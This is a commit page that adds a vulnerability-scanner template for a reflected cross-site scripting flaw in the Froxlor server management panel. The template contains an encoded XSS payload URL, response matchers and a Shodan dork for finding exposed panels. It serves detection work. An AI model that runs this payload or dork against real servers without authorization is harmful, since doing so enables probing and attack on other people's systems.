Create froxlor-reflected-xss.yaml
parent
cb17c8285b
commit
7ccc6a7171
|
@ -0,0 +1,34 @@
|
|||
id: froxlor-reflected-xss
|
||||
|
||||
info:
|
||||
name: Froxlor Reflected XSS
|
||||
author: tess
|
||||
severity: medium
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-dork: title:"Froxlor Server Management Panel"
|
||||
tags: froxlor,xss
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}//index.php/javascript%26colon%3Balert(document.domain);dd%26sol%3b%26sol%3b'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "javascript:alert(document.domain);dd//"
|
||||
- "Froxlor"
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "text/html"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
Loading…
Reference in New Issue